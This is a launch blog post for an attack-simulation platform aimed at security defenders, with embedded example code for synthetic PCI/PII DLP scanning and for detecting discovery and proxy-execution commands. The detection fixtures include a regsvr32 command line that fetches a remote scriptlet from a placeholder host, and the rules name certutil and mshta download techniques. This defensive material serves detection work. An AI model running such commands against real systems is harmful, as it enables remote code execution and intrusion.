It’s been a long time in the works, but we are excited to finally get to a point where we will be officially launching ATTACKIFY soon! That means there is now an actual website and blog for it, and we are busy testing with a small number of close contacts before slowly opening access to more organizations.
After working in the cyber security industry for a long, long time across various disciplines, including penetration testing, consulting, security engineering, malware analysis and a whole bunch of other fields, we are happy to be at the point of releasing something that we feel addresses an area of cyber security that needs a little more attention.
ATTACKIFY was initially conceived as a way to automate threat simulations when testing and validating security controls by mimicking known bad behaviour seen in malware or used by attackers. A CISO once asked us:
“How do we know our expensive security products will detect the same attack currently happening at Sony?”
With that, the very first idea of ATTACKIFY was born; it has been growing, maturing and rewritten a few times since, in a direction we are quite proud of.
Let’s start off with what ATTACKIFY is not:
- It’s not a RED TEAM tool for pwnage!
- It’s not a PENTESTING replacement!
- It’s not going to POP shells!
- It’s not using AI or ML or other next-gen buzzwords (we hope)
- It’s not going to SOLVE all your problems, it may highlight a few more!
While there is always love for the RED side, we didn’t want to build another RED TEAM tool; it was time to show some more love to our teams in BLUE for a change. ATTACKIFY grew through various iterations as a side project over the last 6 years. In that time a few companies launched attack simulation platforms that ended up really expensive and overly complex to run (some of them really good too), which convinced us we were headed in the right direction on the value we wanted to provide: keeping things simple and within budget.
So what is ATTACKIFY then?
At its core ATTACKIFY is a threat simulation, or more precisely an attack simulation, platform with the single goal of helping organisations lift their security posture without breaking the budget! We’re not going to promise crazy things or claim ATTACKIFY does it all and integrates into everything (it doesn’t). We do want to provide value without the smoke and mirrors, with functionality that is going to help you rather than pad a pretty-looking feature list in a brochure.
With ATTACKIFY you can continuously simulate real-world threats within your environment and measure how your security program responds to specific attacker TACTICS, TECHNIQUES and PROCEDURES (TTPs). There is no need to install additional servers or earn a degree in the ATTACKIFY interface; all you need is to run an endpoint agent.
ATTACKIFY enables SECURITY TEAMS to better understand what the different attacks you hear about on the news actually look like. It can help discover potential shortfalls in your current security coverage and show how to better DETECT and RESPOND to BREACHES and ALERTS.
...to see through the eyes of an ATTACKER but with the lens of a DEFENDER...
Many organisations don’t get a second chance to improve their security controls or detection capabilities until it’s too late. In reality, many DEFENDERS are not exposed to the different ATTACKS adversaries use unless it’s during an actual BREACH or a RED TEAM exercise. A large organisation with a big security budget may be able to run a few RED TEAM exercises annually, but that doesn’t help the BLUE TEAM for the rest of the year, and it’s even harder for smaller businesses to uplift their security with a small budget and a lack of resources.
ATTACKIFY can be seen as your BLUE TEAM’s training partner in preparation for ATTACKERS and RED TEAMS, continuously exercising security capabilities year round.
- Simulate malicious software & suspicious user activity
- Emulate behaviour related to:
  - Advanced Persistent Threats
  - Common Ransomware functionality
  - Exploitation techniques
  - Data Exfiltration
- Simulate actual techniques & procedures (safely’ish)
- Validate and fine tune security controls
- Run various Social Engineering attacks
  - Spear Phishing
  - End-User Ransomware Social Engineering
What modules can you run?
For public launch there will be about 90 specific modules in the library, and it will be updated as new attacks and behaviours are discovered and documented. However, we are not going to INUNDATE you with THOUSANDS of modules: only things that are relevant and add value will be added to the library. Also, not every module simulates an attack. ATTACKIFY also contains a number of SECURITY CONTROL modules that can be used to validate endpoint controls and configurations, such as CIS Benchmarks or the ASD Windows Priority Compliance checks.
ATTACKIFY modules have been split into the following categories (but are not limited to them):
- Malware
The malware modules simulate known malware and its common functionality as seen in various samples in the wild. These modules can be used to improve detection of malware techniques and behaviour on endpoints or over the network, as some modules emulate C2 communications with our external C2 simulation servers.
- Data Exfiltration
It is important to understand the different channels an attacker can use to exfiltrate data from the internal network. Equally, it is important to be able to identify the types of data that should or should not be allowed to leave the network, so some modules generate fake HIPAA, PCI, PII and custom data and exfiltrate it to external ATTACKIFY C2s to test firewall rules and DLP solutions.
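A small illustration of what the DLP side of that exercise looks like, added here as an example (this is not ATTACKIFY code): generate a Luhn-valid synthetic test card number and a fake SSN, embed them in a constructed outbound “customer export”, and run a minimal DLP-style scan over the payload. The record layout, the regexes and the function names are assumptions made for this example; the values are synthetic and never real cardholder data.

```python
# Added example (not ATTACKIFY code): synthetic PCI/PII test data plus a
# minimal DLP-style scan. Record layout and regexes are assumptions; the
# generated values are constructed test data, not real cardholder data.
from __future__ import annotations

import random
import re


def _luhn_sum(digits_right_to_left: list[int]) -> int:
    """Luhn sum: double every second digit counting from the right, starting
    with the digit immediately left of the check digit."""
    total = 0
    for i, d in enumerate(digits_right_to_left):
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total


def luhn_valid(number: str) -> bool:
    """True if the digit string carries a correct Luhn check digit (real PANs do)."""
    digits = [int(c) for c in number]
    return _luhn_sum(list(reversed(digits))) % 10 == 0


def luhn_check_digit(partial: str) -> str:
    """Check digit that makes partial + digit Luhn-valid. A placeholder 0 is
    appended so the partial's digits sit in the same positions as in the PAN."""
    digits = [int(c) for c in partial] + [0]
    return str((10 - _luhn_sum(list(reversed(digits))) % 10) % 10)


def synthetic_pan(seed: int, prefix: str = "4", length: int = 16) -> str:
    """Deterministic Luhn-valid test PAN (prefix 4 mimics the Visa IIN range)."""
    rng = random.Random(seed)
    body = prefix + "".join(str(rng.randrange(10)) for _ in range(length - len(prefix) - 1))
    return body + luhn_check_digit(body)


def synthetic_ssn(seed: int) -> str:
    """Deterministic fake SSN in a plausible shape (SSA never issues 000, 666, 9xx)."""
    rng = random.Random(seed)
    area = rng.choice([a for a in range(1, 900) if a != 666])
    return f"{area:03d}-{rng.randrange(1, 100):02d}-{rng.randrange(1, 10000):04d}"


# Stage 1: loose patterns. Stage 2 (Luhn) is what keeps PAN false positives down.
PAN_RE = re.compile(r"(?<!\d)\d(?:[ -]?\d){12,18}(?!\d)")
SSN_RE = re.compile(r"(?<!\d)(?!000|666|9\d\d)\d{3}-(?!00)\d{2}-(?!0000)\d{4}(?!\d)")


def find_pans(text: str) -> list[str]:
    """Digit runs of 13-19 (spaces/dashes allowed) that also pass Luhn."""
    hits = []
    for m in PAN_RE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group(0))
        if luhn_valid(digits):
            hits.append(digits)
    return hits


def find_ssns(text: str) -> list[str]:
    return SSN_RE.findall(text)


def scan_outbound(payload: str) -> dict:
    """Minimal DLP verdict for one outbound payload."""
    pans, ssns = find_pans(payload), find_ssns(payload)
    return {"pan": pans, "ssn": ssns, "block": bool(pans or ssns)}


def build_exfil_payload(seed: int = 1) -> str:
    """Constructed 'customer export' of the kind a simulation module would push
    outbound. The second row is a benign order id that must not be flagged."""
    return (
        "id,name,card,ssn\n"
        f"1001,Test Customer,{synthetic_pan(seed)},{synthetic_ssn(seed)}\n"
        "1002,Benign Row,order-20240110-000042,n/a\n"
    )


if __name__ == "__main__":
    payload = build_exfil_payload()
    print(payload)
    print(scan_outbound(payload))
```

A real DLP product adds context (IIN ranges, keyword proximity, file type, destination), but the two-stage shape, a loose pattern followed by a validity check, is what keeps the noise down: a random 16-digit order number passes the regex and fails Luhn nine times out of ten. Pushing the synthetic record through the egress path and checking whether the control flags it is exactly the test this module category describes.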
- Exploitation
Safely run various exploitation techniques related to privilege escalation, process injection, UAC bypasses, process hollowing etc. These modules are not designed to pop shells but to simulate the exploit safely enough to generate the data needed to determine whether it succeeded; in some cases, at worst, they pop calc.exe as SYSTEM as evidence :)
- Execution
Attackers are always finding ways to bypass execution prevention controls and execute code or commands without alerting or generating logs. Run these execution techniques, as used in the real world, to test security controls and improve detection and logging.
- Discovery
Attackers use a variety of techniques to fingerprint endpoints and better understand the environment they are moving through. From account discovery, domain user and data enumeration to port scanning, use these modules to check that suspicious behaviour is detected on endpoints or across networks.
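What the defender gets out of the Execution and Discovery categories is a set of detections to write and tune. The following is an added example (not ATTACKIFY code, and not its module list) of that detection logic run over constructed process-creation events: signed-binary proxy execution (regsvr32 with scrobj.dll, mshta, rundll32 javascript:, certutil -urlcache) alerts on a single hit, while discovery commands (net user/group /domain, nltest, whoami) are aggregated, because one `net user` is admin noise but three distinct discovery commands from the same user in a few minutes is reconnaissance. The event schema, rule names and sample events are assumptions for this example.

```python
# Added example (not ATTACKIFY code): detection logic for discovery bursts and
# signed-binary proxy execution, run over constructed process-creation events.
# The event schema (ts/host/user/cmdline) is an assumption for this example;
# the command-line shapes are the common real-world forms of these techniques.
from __future__ import annotations

import re
from collections import defaultdict
from datetime import datetime, timedelta

# (rule name, regex over the lower-cased command line)
DISCOVERY_RULES = [
    ("domain_account_discovery", r"\bnet1?(?:\.exe)?\s+(?:user|group|localgroup)\b.*/dom(?:ain)?\b"),
    ("dc_discovery", r"\bnltest(?:\.exe)?\s+/(?:dclist|domain_trusts|dsgetdc)"),
    ("identity_discovery", r"\bwhoami(?:\.exe)?\b"),
    ("ad_query", r"\b(?:dsquery|adfind)(?:\.exe)?\b"),
]
EXECUTION_RULES = [
    ("regsvr32_scrobj", r"\bregsvr32(?:\.exe)?\b.*/i:.*\bscrobj\.dll\b"),
    ("mshta_remote", r"\bmshta(?:\.exe)?\s+(?:https?:|vbscript:|javascript:)"),
    ("rundll32_script", r"\brundll32(?:\.exe)?\s+javascript:"),
    ("certutil_download", r"\bcertutil(?:\.exe)?\b.*-urlcache\b"),
]

EVENTS = [  # constructed sample telemetry (Sysmon EID 1 / Windows 4688 style), not real logs
    {"ts": "2024-01-10T09:00:01", "host": "WS01", "user": "CORP\\alice",
     "cmdline": "whoami /all"},
    {"ts": "2024-01-10T09:00:20", "host": "WS01", "user": "CORP\\alice",
     "cmdline": 'net group "domain admins" /domain'},
    {"ts": "2024-01-10T09:00:45", "host": "WS01", "user": "CORP\\alice",
     "cmdline": "nltest /dclist:corp.local"},
    {"ts": "2024-01-10T09:30:00", "host": "WS02", "user": "CORP\\bob",
     "cmdline": "net user /domain"},
    {"ts": "2024-01-10T10:15:00", "host": "WS03", "user": "CORP\\carol",
     "cmdline": "regsvr32 /s /n /u /i:http://example.invalid/p.sct scrobj.dll"},
    {"ts": "2024-01-10T10:16:00", "host": "WS03", "user": "CORP\\carol",
     "cmdline": "notepad.exe C:\\Users\\carol\\notes.txt"},
]


def match_rules(cmdline: str, rules: list[tuple[str, str]]) -> list[str]:
    low = cmdline.lower()
    return [name for name, pattern in rules if re.search(pattern, low)]


def classify(event: dict) -> dict:
    """Per-event rule hits; the caller decides what is alert-worthy."""
    return {
        "discovery": match_rules(event["cmdline"], DISCOVERY_RULES),
        "execution": match_rules(event["cmdline"], EXECUTION_RULES),
    }


def detect(events: list[dict], window: timedelta = timedelta(minutes=5), threshold: int = 3) -> list[dict]:
    """Execution-bypass hits alert on their own. Discovery hits are aggregated:
    `threshold` distinct discovery rules for the same host+user inside `window`
    raise one discovery_burst alert per host+user."""
    alerts: list[dict] = []
    seen: dict[tuple[str, str], list[tuple[datetime, str]]] = defaultdict(list)
    burst_fired: set[tuple[str, str]] = set()
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts = datetime.fromisoformat(ev["ts"])
        hits = classify(ev)
        for rule in hits["execution"]:
            alerts.append({"rule": rule, "host": ev["host"], "user": ev["user"],
                           "ts": ev["ts"], "cmdline": ev["cmdline"]})
        key = (ev["host"], ev["user"])
        for rule in hits["discovery"]:
            seen[key].append((ts, rule))
        recent = sorted({r for t, r in seen[key] if ts - t <= window})
        if len(recent) >= threshold and key not in burst_fired:
            burst_fired.add(key)
            alerts.append({"rule": "discovery_burst", "host": ev["host"], "user": ev["user"],
                           "ts": ev["ts"], "rules": recent})
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

On the constructed events this yields two alerts: a discovery burst for alice on WS01 (identity, domain account and DC discovery inside 45 seconds) and a regsvr32/scrobj.dll execution hit for carol on WS03; bob’s single `net user /domain` stays below the threshold. When a simulation module runs the same commands on a monitored endpoint, the question is whether your EDR or SIEM produced the equivalent of these two alerts, and if not, which of the command lines never reached the log in the first place.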
- APT
APT tactics, techniques and procedures are mostly well documented, but they are always changing and improving. These modules emulate individual APT TTPs rather than an entire campaign in a single hit, to help security teams identify and understand each type of activity and best detect, alert on and prevent it.
- Ransomware
Ransomware is a bigger problem now than ever before. We have a small (and growing) number of modules designed to simulate actual ransomware behaviour, techniques and process calls to help security teams better understand, detect and prevent outbreaks.
- Security Controls
ATTACKIFY has a number of endpoint security control modules designed to audit endpoints against a number of compliance requirements (CIS Benchmarks) and password policies, and to assess endpoint exploitability according to the Service Pack, hotfixes and patches installed, audited against Microsoft Security Bulletin data.
Is it available?
Not quite yet! We are working with a few people on this, getting feedback and making adjustments as needed, but feel free to get in touch with us if you have an interest in ATTACKIFY.